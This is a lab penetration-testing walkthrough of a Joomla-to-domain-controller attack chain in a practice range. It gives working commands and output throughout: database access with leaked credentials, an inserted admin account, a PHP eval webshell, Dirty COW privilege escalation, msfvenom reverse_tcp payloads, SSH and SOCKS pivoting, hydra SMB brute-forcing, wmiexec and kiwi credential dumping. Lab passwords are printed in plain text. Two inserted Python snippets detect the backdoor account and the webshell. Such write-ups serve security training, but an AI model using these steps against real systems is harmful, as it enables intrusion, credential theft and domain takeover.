紅日安全 internal network range (3): penetration write-up
The environment setup is omitted here.
Information collected so far
- One web server with a public IP (in my case the 16.16.16.0 segment, 16.16.16.160)
- Ports 22, 80 and 3306 open
- Joomla 3.9.12
- MySQL 5.7.27
- Sensitive directories and files
  - 1.php: a phpinfo page (note: disable_functions disables many functions, which affects command execution from the webshell later)
  - /administrator/: back-end login
  - configuration.php~: backup copy of the configuration file
    - Database connection account and password (testuser/cvcvgjASD!@)
    - Database table prefix (am2zu_)
Getting the back end
Since 3306 is open, we try connecting to the database directly from the attacking machine
cmd: mysql -u testuser -h 16.16.16.160 -p
// press Enter, type the password, and you are in the database
MySQL [joomla]>
MySQL [joomla]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| joomla |
+--------------------+
2 rows in set (0.011 sec)
MySQL [joomla]> use joomla;
Database changed
MySQL [joomla]> show tables;
+-------------------------------+
| Tables_in_joomla |
+-------------------------------+
| am2zu_action_log_config |
| am2zu_action_logs |
| am2zu_action_logs_extensions |
| am2zu_action_logs_users |
| am2zu_assets |
| am2zu_associations |
| am2zu_banner_clients |
| am2zu_banner_tracks |
| am2zu_banners |
| am2zu_categories |
| am2zu_contact_details |
| am2zu_content |
| am2zu_content_frontpage |
| am2zu_content_rating |
| am2zu_content_types |
| am2zu_contentitem_tag_map |
| am2zu_core_log_searches |
| am2zu_extensions |
| am2zu_fields |
| am2zu_fields_categories |
| am2zu_fields_groups |
| am2zu_fields_values |
| am2zu_finder_filters |
| am2zu_finder_links |
| am2zu_finder_links_terms0 |
| am2zu_finder_links_terms1 |
| am2zu_finder_links_terms2 |
| am2zu_finder_links_terms3 |
| am2zu_finder_links_terms4 |
| am2zu_finder_links_terms5 |
| am2zu_finder_links_terms6 |
| am2zu_finder_links_terms7 |
| am2zu_finder_links_terms8 |
| am2zu_finder_links_terms9 |
| am2zu_finder_links_termsa |
| am2zu_finder_links_termsb |
| am2zu_finder_links_termsc |
| am2zu_finder_links_termsd |
| am2zu_finder_links_termse |
| am2zu_finder_links_termsf |
| am2zu_finder_taxonomy |
| am2zu_finder_taxonomy_map |
| am2zu_finder_terms |
| am2zu_finder_terms_common |
| am2zu_finder_tokens |
| am2zu_finder_tokens_aggregate |
| am2zu_finder_types |
| am2zu_languages |
| am2zu_menu |
| am2zu_menu_types |
| am2zu_messages |
| am2zu_messages_cfg |
| am2zu_modules |
| am2zu_modules_menu |
| am2zu_newsfeeds |
| am2zu_overrider |
| am2zu_postinstall_messages |
| am2zu_privacy_consents |
| am2zu_privacy_requests |
| am2zu_redirect_links |
| am2zu_schemas |
| am2zu_session |
| am2zu_tags |
| am2zu_template_styles |
| am2zu_ucm_base |
| am2zu_ucm_content |
| am2zu_ucm_history |
| am2zu_update_sites |
| am2zu_update_sites_extensions |
| am2zu_updates |
| am2zu_user_keys |
| am2zu_user_notes |
| am2zu_user_profiles |
| am2zu_user_usergroup_map |
| am2zu_usergroups |
| am2zu_users |
| am2zu_utf8_conversion |
| am2zu_viewlevels |
| umnbt_action_log_config |
| umnbt_action_logs |
| umnbt_action_logs_extensions |
| umnbt_action_logs_users |
| umnbt_assets |
| umnbt_associations |
| umnbt_banner_clients |
| umnbt_banner_tracks |
| umnbt_banners |
| umnbt_categories |
| umnbt_contact_details |
| umnbt_content |
| umnbt_content_frontpage |
| umnbt_content_rating |
| umnbt_content_types |
| umnbt_contentitem_tag_map |
| umnbt_core_log_searches |
| umnbt_extensions |
| umnbt_fields |
| umnbt_fields_categories |
| umnbt_fields_groups |
| umnbt_fields_values |
| umnbt_finder_filters |
| umnbt_finder_links |
| umnbt_finder_links_terms0 |
| umnbt_finder_links_terms1 |
| umnbt_finder_links_terms2 |
| umnbt_finder_links_terms3 |
| umnbt_finder_links_terms4 |
| umnbt_finder_links_terms5 |
| umnbt_finder_links_terms6 |
| umnbt_finder_links_terms7 |
| umnbt_finder_links_terms8 |
| umnbt_finder_links_terms9 |
| umnbt_finder_links_termsa |
| umnbt_finder_links_termsb |
| umnbt_finder_links_termsc |
| umnbt_finder_links_termsd |
| umnbt_finder_links_termse |
| umnbt_finder_links_termsf |
| umnbt_finder_taxonomy |
| umnbt_finder_taxonomy_map |
| umnbt_finder_terms |
| umnbt_finder_terms_common |
| umnbt_finder_tokens |
| umnbt_finder_tokens_aggregate |
| umnbt_finder_types |
| umnbt_languages |
| umnbt_menu |
| umnbt_menu_types |
| umnbt_messages |
| umnbt_messages_cfg |
| umnbt_modules |
| umnbt_modules_menu |
| umnbt_newsfeeds |
| umnbt_overrider |
| umnbt_postinstall_messages |
| umnbt_privacy_consents |
| umnbt_privacy_requests |
| umnbt_redirect_links |
| umnbt_schemas |
| umnbt_session |
| umnbt_tags |
| umnbt_template_styles |
| umnbt_ucm_base |
| umnbt_ucm_content |
| umnbt_ucm_history |
| umnbt_update_sites |
| umnbt_update_sites_extensions |
| umnbt_updates |
| umnbt_user_keys |
| umnbt_user_notes |
| umnbt_user_profiles |
| umnbt_user_usergroup_map |
| umnbt_usergroups |
| umnbt_users |
| umnbt_utf8_conversion |
| umnbt_viewlevels |
+-------------------------------+
156 rows in set (0.011 sec)
// combining this with the table prefix from the configuration file, we look at the "am2zu_users" table, guessing it is the one that stores the back-end accounts
MySQL [joomla]> select * from am2zu_users;
+-----+----------------+---------------+---------------+-------------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+
| id | name | username | email | password | block | sendEmail | registerDate | lastvisitDate | activation | params | lastResetTime | resetCount | otpKey | otep | requireReset |
+-----+----------------+---------------+---------------+-------------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+
| 891 | Super User | administrator | test@test.com | $2y$10$t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2 | 0 | 1 | 2019-10-19 12:48:41 | 0000-00-00 00:00:00 | 0 | | 0000-00-00 00:00:00 | 0 | | | 0 |
+-----+----------------+---------------+---------------+-------------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+
2 rows in set (0.011 sec)
Searching the web for how Joomla hashes passwords, I found that "$2y$10$t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2" was produced by password_hash($password, PASSWORD_BCRYPT); and found no way to reverse it.
I also tried brute-forcing the login with Burp, with no result. I was stuck here for a long time.
Later, reading the official Joomla documentation, I found that an administrator account can be added by inserting directly into the database. What luck: we already have database access.
//https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn
// jos31 in the SQL below must be replaced with your actual table prefix
INSERT INTO `jos31_users`
(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('Administrator2', 'admin2',
'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `jos31_user_usergroup_map` (`user_id`,`group_id`)
VALUES (LAST_INSERT_ID(),'8');
// after running these two statements, an administrator user has been added (account: admin2, password: secret)
Logging in at http://16.16.16.160/administrator/ succeeded.
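A defender-side check that follows from the insert above, added here as an example (it is not from the write-up or from Joomla): an account created through the application gets a bcrypt hash, while the documented manual INSERT writes the legacy md5:salt layout and fills all three timestamps with NOW(), so a Super Users member showing either trait was most likely added straight into the database. The row layout and the sample rows are constructed.

```python
import re
from dataclasses import dataclass

# Hash layouts Joomla 3.x stores in <prefix>_users (constructed check, not Joomla code).
# Joomla 3.2+ writes bcrypt; the legacy "md5hex:salt" layout is what the manual INSERT writes.
BCRYPT_RE = re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$")
LEGACY_RE = re.compile(r"^[0-9a-f]{32}:[A-Za-z0-9]{32}$")
SUPER_USERS_GROUP = 8   # default id of the "Super Users" group
ZERO_TS = "0000-00-00 00:00:00"

@dataclass
class UserRow:
    # One <prefix>_users row plus its group ids from <prefix>_user_usergroup_map.
    id: int
    username: str
    password: str
    registerDate: str
    lastvisitDate: str
    lastResetTime: str
    groups: tuple = ()

def hash_kind(stored: str) -> str:
    if BCRYPT_RE.match(stored):
        return "bcrypt"
    if LEGACY_RE.match(stored):
        return "legacy-md5"
    return "unknown"

def audit_super_users(rows):
    # Return {username: [reasons]} for Super Users that look directly inserted.
    findings = {}
    for r in rows:
        if SUPER_USERS_GROUP not in r.groups:
            continue
        reasons = []
        kind = hash_kind(r.password)
        if kind != "bcrypt":
            reasons.append(f"{kind} password hash instead of bcrypt")
        # The manual INSERT fills all three timestamps with NOW(); a real login
        # history never leaves lastvisitDate equal to the registration instant.
        if r.registerDate == r.lastvisitDate == r.lastResetTime != ZERO_TS:
            reasons.append("register/lastvisit/lastReset timestamps identical")
        if reasons:
            findings[r.username] = reasons
    return findings

# Constructed sample rows: the lab's original admin, an account inserted the way
# the write-up describes, and an unrelated editor (group 4).
SAMPLE_ROWS = [
    UserRow(891, "administrator", "$2y$10$t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2",
            "2019-10-19 12:48:41", ZERO_TS, ZERO_TS, (8,)),
    UserRow(892, "admin2", "d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199",
            "2022-03-03 07:00:00", "2022-03-03 07:00:00", "2022-03-03 07:00:00", (8,)),
    UserRow(893, "editor", "$2y$10$t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2",
            "2021-05-01 10:00:00", "2021-05-02 09:30:00", ZERO_TS, (4,)),
]
```

Run `audit_super_users` over a dump of the users table joined with the usergroup map; only admin2 is reported, with both reasons.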
Getting a webshell
Searching for Joomla back-end getshell techniques, I found that under Extensions->Templates you can get a shell by editing the template's PHP files.
Specifically, open the template's edit page, modify index.php or add a new PHP file, and put the one-liner <?php @eval($_POST['hack'])?> in it.
Connect to it directly with 蟻劍 (AntSword).

In the virtual terminal, commands could not be executed; evidently the functions are disabled.
In practice, AntSword's "PHP7 GC with Certain Destructors UAF" plugin bypassed the restriction directly.
But it is a low-privilege account:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
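A detection-side counterpart to the template edit above, added as an example (it is not from the write-up, Joomla or AntSword): it walks a Joomla templates directory and flags PHP lines where a code-execution sink is fed directly from a request superglobal, which is exactly the shape of the one-liner planted here. The sample tree, its paths and file contents are constructed.

```python
import re
import tempfile
from pathlib import Path

# A one-line PHP webshell is a code-execution sink fed straight from a request
# superglobal. Constructed detection logic, not part of Joomla or the write-up.
SINKS = r"(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open)"
SUPERGLOBALS = r"\$_(?:POST|GET|REQUEST|COOKIE)\b|\$GLOBALS\b"
ONE_LINER_RE = re.compile(rf"@?\b{SINKS}\s*\(\s*(?:{SUPERGLOBALS})", re.IGNORECASE)

def scan_php_file(path: Path):
    """Return (line_no, stripped_line) pairs in one file that match the pattern."""
    hits = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for no, line in enumerate(fh, 1):
            if ONE_LINER_RE.search(line):
                hits.append((no, line.strip()))
    return hits

def scan_templates(root: Path):
    """Walk a Joomla templates directory; return {posix_relative_path: hits}."""
    findings = {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_php_file(path)
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings

def build_sample_tree() -> Path:
    """Construct a throwaway templates tree: one clean file, one backdoored file."""
    root = Path(tempfile.mkdtemp(prefix="joomla_templates_"))
    (root / "protostar").mkdir()
    (root / "protostar" / "index.php").write_text(
        "<?php\ndefined('_JEXEC') or die;\n"
        "$app = JFactory::getApplication();\necho $app->getName();\n")
    # The same one-liner the write-up plants, after a legitimate-looking header line.
    (root / "protostar" / "error.php").write_text(
        "<?php defined('_JEXEC') or die; ?>\n<?php @eval($_POST['hack'])?>\n")
    return root

if __name__ == "__main__":
    for rel, hits in scan_templates(build_sample_tree()).items():
        for no, text in hits:
            print(f"{rel}:{no}: {text}")
```

Point `scan_templates` at a real templates directory (or at a full web root) to get a per-file list of suspicious lines; a plain `eval` with a literal argument is not reported, only one that reads request input.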
Privilege escalation
Try checking the Linux version
(www-data:/var/www/html/templates) $ lsb_release -a
Distributor ID: Ubuntu
Description: Ubuntu 16.04.6 LTS
Release: 16.04
Codename: xenial
(www-data:/var/www/html/templates) $ uname -a
Linux ubuntu 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
I tried several local privilege-escalation exploits for the 4.4.0 kernel without success. After a long stalemate I decided to go back and rethink.
...
Then a twist: browsing directories with AntSword, I found a test.txt file under /tmp/mysql; it turned out to be a backup of an account and password
adduser wwwuser
passwd wwwuser_123Aqx
SSH in directly
ssh wwwuser@16.16.16.160
The connection lands as an ordinary user. Run uname -a again
Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
Kernel 2.6.32; search for a matching exploit
searchsploit linux 2.6 cow
------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID M | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Meth | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method) | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd M | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method) | linux/local/40611.c
------------------------------------------------------------------------------------------------------------- ---------------------------------
After several attempts, linux/local/40839.c escalated successfully. The steps:
1. First download the file
searchsploit -m linux/local/40839.c
2. Serve it over HTTP with Python on the attacking machine
python3 -m http.server
3. Download it on the Linux machine
wget http://16.16.16.160/40839.c
4. Compile
gcc -pthread -o 40839 40839.c -lcrypt
5. Run
./40839
6. On success it prompts you for a password
7. A root-privileged user is created (firefart/yourpassword)
8. su firefart and enter the password
# ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:32:46:C9
inet addr:16.16.16.167 Bcast:16.16.16.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe32:46c9/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5074 errors:0 dropped:0 overruns:0 frame:0
TX packets:2521 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:684640 (668.5 KiB) TX bytes:692275 (676.0 KiB)
eth1 Link encap:Ethernet HWaddr 00:0C:29:32:46:D3
inet addr:192.168.93.100 Bcast:192.168.93.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe32:46d3/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:43309 errors:0 dropped:0 overruns:0 frame:0
TX packets:519 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4423428 (4.2 MiB) TX bytes:66073 (64.5 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:1#
Moving to msf
msfvenom -p python/meterpreter/reverse_tcp LHOST=16.16.16.160 LPORT=4444 -f raw -o payload.py
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 16.16.16.160
set LPORT 4444
run
# after a session is obtained
bg
# set up routing
use post/multi/manage/autoroute
set session 1
run
# start the socks5 proxy
use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
After starting the socks proxy, test it with proxychains on the attacking machine
# configure the socks5 proxy in proxychains
# socks5 127.0.0.1 1080
proxychains curl http://192.168.93.100 # this is an internal IP; if it connects, the socks proxy is working
# run ping on the current machine to find live internal hosts
for k in $( seq 1 255);do ping -c 1 192.168.93.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done
192.168.93.1
192.168.93.10
192.168.93.20
192.168.93.30
192.168.93.100 (CentOS; reverse-proxies the Ubuntu web and database services)
192.168.93.120 (Ubuntu; provides the web service)
From the scanned IPs we can see there are 5 machines in total.
# nmap scan of the corresponding hosts
proxychains nmap -sT -sV -Pn 192.168.93.10,20,30,100,120
192.168.93.120
------------------
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18
3306/tcp open mysql MySQL 5.7.27-0ubuntu0.16.04.1
192.168.93.10
------------------
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-03 06:55:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: test.org, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: TEST)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: test.org, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49155/tcp open unknown
49156/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49157/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
Service Info: Host: WIN-8GA56TNV3MV; OS: Windows; CPE: cpe:/o:microsoft:windows
192.168.93.20
----------------
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135/tcp open msrpc?
139/tcp open netbios-ssn?
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 microsoft-ds (workgroup: TEST)
1433/tcp open ms-sql-s Microsoft SQL Server 2008 10.00.1600; RTM
2383/tcp open ms-olap4?
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49158/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: WIN2008; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2
192.168.93.30
-------------------
PORT STATE SERVICE VERSION
135/tcp open msrpc?
139/tcp open netbios-ssn?
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: TEST)
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49163/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: WIN7; OS: Windows; CPE: cpe:/o:microsoft:windows
Summarising the nmap results for 192.168.93.10, 20 and 30:
10: most likely the domain controller; runs DNS and LDAP; domain: test.org
20: Windows 2008 R2 domain member, running MSSQL
30: Windows 7 domain member
First I ran ms17-010; none of the three machines is vulnerable. So much for a one-shot win. Looking back over the collected information, the .20 machine exposes MSSQL, but we have no account for it. Then I remembered the earlier MySQL credentials and tried them against it, and the login actually worked, but only as a low-privileged guest database account, which I could not escalate.
Later I saw that others online had brute-forced SMB successfully with the password 123qwe!ASD. I was stunned; was my wordlist really that bad? Nothing to say except add the password to the dictionary. =-=
proxychains -q hydra -l administrator -P top10000.txt smb://192.168.93.20/ # 123qwe!ASD
proxychains -q hydra -l administrator -P top10000.txt smb://192.168.93.30/ # 123qwe!ASD
The plan now is to generate a Windows payload with msf, upload it to 192.168.93.20 and run it to get a reverse meterpreter. One problem: 192.168.93.20 has no outbound access. Solution: use the CentOS machine (192.168.93.100) as a pivot and set up a port forward so that the pivot's port 55555 is forwarded to port 55555 on the Kali attacking machine. We use an SSH tunnel for this: first SSH into CentOS, then run the following command:
// -C compress the transfer; -f send ssh to the background so it does not occupy the current shell; -N do not execute a remote command; -g allow remote hosts to connect to the local forwarded port; -L local port forward; 16.16.16.182 is the Kali attacking machine's IP
ssh -CfNg -L 55555:16.16.16.182:55555 root@16.16.16.182
With the port forward in place, generate the Windows payload with msf
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.93.100 LPORT=55555 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o /root/55555.exe
// the payload calls back to the pivot; msf only needs to listen on the Kali machine
msf listener settings
msf
LHOST 16.16.16.182
LPORT 55555
Use smbclient on Kali to connect and upload the generated 55555.exe
proxychains -q smbclient //192.168.93.20/c$ -U administrator
smb: \>put 55555.exe
wmiexec.py from the impacket toolkit gives us a cmd session:
proxychains -q python3 wmiexec.py administrator:123qwe\!ASD@192.168.93.20
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
# run 55555.exe
C:\>55555.exe (it may take several runs to succeed)
Once that is done, msf has a meterpreter session on 192.168.93.20
meterpreter > getsystem
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
# migrate into a SYSTEM process
migrate xxxpid
# load kiwi
meterpreter > load kiwi
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
Administrator TEST fc5d63d71569f04399b41 18edd0cc3227be3bf61ce 0f058e319f079c15fe3449
9bc76e2eb34 198835a1d97 bbeffc086cfa4d231e
Administrator WIN2008 ae946ec6f4ca785b93371 31c1794c5aa8547c87a8b 128c0272959b85b3300906
dee1d5ee7e6 cd0324b8337 11169d07d85cb6bd0b
WIN2008$ TEST c47b1f47431b259861e61 5a09ade7dca624916c3947
5472864c698 3fd609c22302dd33bc
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator TEST zxcASDqw123!!
Administrator WIN2008 123qwe!ASD
...
This directly yields the domain controller account and password: TEST\Administrator:zxcASDqw123!!
If the goal is only the flag, just log in with smbclient
root@kali ~ proxychains -q smbclient -U administrator //192.168.93.10/c$
Enter WORKGROUP\administrator's password:
Try "help" to get a list of possible commands.
smb: \> pwd
Current directory is \\192.168.93.10\c$\
smb: \> cd Users/Administrator/Documents/
smb: \Users\Administrator\Documents\> ls
. DR 0 Thu Oct 31 00:52:43 2019
.. DR 0 Thu Oct 31 00:52:43 2019
desktop.ini AHS 402 Wed Oct 30 22:12:57 2019
flag.txt A 13 Thu Oct 31 00:53:16 2019
My Music DHSrn 0 Sun Oct 6 19:14:33 2019
My Pictures DHSrn 0 Sun Oct 6 19:14:33 2019
My Videos DHSrn 0 Sun Oct 6 19:14:33 2019
15728127 blocks of size 4096. 12293852 blocks available
smb: \Users\Administrator\Documents\>get flag.txt
smb: \Users\Administrator\Documents\>exit
root@kali ~ cat flag.txt
this is flag!#
To get a meterpreter session in msf, do the same as for the win2008 machine: upload the msf-generated 55555.exe, run it, and msf gets a meterpreter session.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 16.16.16.182:55555
[*] Sending stage (175174 bytes) to 16.16.16.182
[*] Meterpreter session 5 opened (16.16.16.182:55555 -> 16.16.16.182:45240 ) at 2022-03-09 19:18:08 +0800
meterpreter > sysinfo
Computer : WIN-8GA56TNV3MV
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : TEST
Logged On Users : 4
Meterpreter : x86/windows
meterpreter > getuid
Server username: TEST\Administrator